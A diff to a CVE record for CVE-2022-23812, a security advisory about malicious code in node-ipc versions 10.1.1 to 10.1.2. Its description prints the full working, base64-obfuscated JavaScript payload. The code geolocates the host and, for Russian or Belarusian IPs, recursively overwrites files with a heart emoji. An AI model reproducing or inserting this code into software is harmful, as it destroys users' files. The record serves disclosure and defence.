diff --git a/2022/23xxx/CVE-2022-23812.json b/2022/23xxx/CVE-2022-23812.json index b730368d73f..b788aecd31c 100644 --- a/2022/23xxx/CVE-2022-23812.json +++ b/2022/23xxx/CVE-2022-23812.json @@ -3,16 +3,104 @@ "data_format": "MITRE", "data_version": "4.0", "CVE_data_meta": { + "ASSIGNER": "report@snyk.io", + "DATE_PUBLIC": "2022-03-16T15:41:22.870186Z", "ID": "CVE-2022-23812", - "ASSIGNER": "cve@mitre.org", - "STATE": "RESERVED" + "STATE": "PUBLIC", + "TITLE": "Malicious Package" + }, + "affects": { + "vendor": { + "vendor_data": [ + { + "product": { + "product_data": [ + { + "product_name": "node-ipc", + "version": { + "version_data": [ + { + "version_affected": ">=", + "version_value": "10.1.1" + }, + { + "version_affected": "<", + "version_value": "10.1.3" + } + ] + } + } + ] + }, + "vendor_name": "n/a" + } + ] + } + }, + "problemtype": { + "problemtype_data": [ + { + "description": [ + { + "lang": "eng", + "value": "Malicious Package" + } + ] + } + ] + }, + "references": { + "reference_data": [ + { + "refsource": "CONFIRM", + "url": "https://snyk.io/vuln/SNYK-JS-NODEIPC-2426370" + }, + { + "refsource": "CONFIRM", + "url": "https://github.com/RIAEvangelist/node-ipc/issues/236" + }, + { + "refsource": "CONFIRM", + "url": "https://github.com/RIAEvangelist/node-ipc/issues/233" + }, + { + "refsource": "CONFIRM", + "url": "https://github.com/RIAEvangelist/node-ipc/blob/847047cf7f81ab08352038b2204f0e7633449580/dao/ssl-geospec.js" + }, + { + "refsource": "CONFIRM", + "url": "https://github.com/RIAEvangelist/node-ipc/commit/847047cf7f81ab08352038b2204f0e7633449580" + } + ] }, "description": { "description_data": [ { "lang": "eng", - "value": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided." + "value": "This affects the package node-ipc from 10.1.1 and before 10.1.3.\n This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji.\r\n\r\n**Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior.\r\n\r\n Malicious Code:\r\n\r\n**Note:** Don't run it!\r\n\r\njs\r\nimport u from \"path\";\r\nimport a from \"fs\";\r\nimport o from \"https\";\r\nsetTimeout(function () {\r\n const t = Math.round(Math.random() * 4);\r\n if (t > 1) {\r\n return;\r\n }\r\n const n = Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=\", \"base64\"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154\r\n o.get(n.toString(\"utf8\"), function (t) {\r\n t.on(\"data\", function (t) {\r\n const n = Buffer.from(\"Li8=\", \"base64\");\r\n const o = Buffer.from(\"Li4v\", \"base64\");\r\n const r = Buffer.from(\"Li4vLi4v\", \"base64\");\r\n const f = Buffer.from(\"Lw==\", \"base64\");\r\n const c = Buffer.from(\"Y291bnRyeV9uYW1l\", \"base64\");\r\n const e = Buffer.from(\"cnVzc2lh\", \"base64\");\r\n const i = Buffer.from(\"YmVsYXJ1cw==\", \"base64\");\r\n try {\r\n const s = JSON.parse(t.toString(\"utf8\"));\r\n const u = s[c.toString(\"utf8\")].toLowerCase();\r\n const a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\")); // checks if country is Russia or Belarus\r\n if (a) {\r\n h(n.toString(\"utf8\"));\r\n h(o.toString(\"utf8\"));\r\n h(r.toString(\"utf8\"));\r\n h(f.toString(\"utf8\"));\r\n }\r\n } catch (t) {}\r\n });\r\n });\r\n}, Math.ceil(Math.random() * 1e3));\r\nasync function h(n = \"\", o = \"\") {\r\n if (!a.existsSync(n)) {\r\n return;\r\n }\r\n let r = [];\r\n try {\r\n r = a.readdirSync(n);\r\n } catch (t) {}\r\n const f = [];\r\n const c = Buffer.from(\"4p2k77iP\", \"base64\");\r\n for (var e = 0; e < r.length; e++) {\r\n const i = u.join(n, r[e]);\r\n let t = null;\r\n try {\r\n t = a.lstatSync(i);\r\n } catch (t) {\r\n continue;\r\n }\r\n if (t.isDirectory()) {\r\n const s = h(i, o);\r\n s.length > 0 ? f.push(...s) : null;\r\n } else if (i.indexOf(o) >= 0) {\r\n try {\r\n a.writeFile(i, c.toString(\"utf8\"), function () {}); // overwrites file with \u2764\ufe0f\r\n } catch (t) {}\r\n }\r\n }\r\n return f;\r\n}\r\nconst ssl = true;\r\nexport { ssl as default, ssl };\r\n\n" } ] - } + }, + "impact": { + "cvss": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "baseScore": 9.8, + "baseSeverity": "CRITICAL", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH" + } + }, + "credit": [ + { + "lang": "eng", + "value": "Unknown" + } + ] } \ No newline at end of file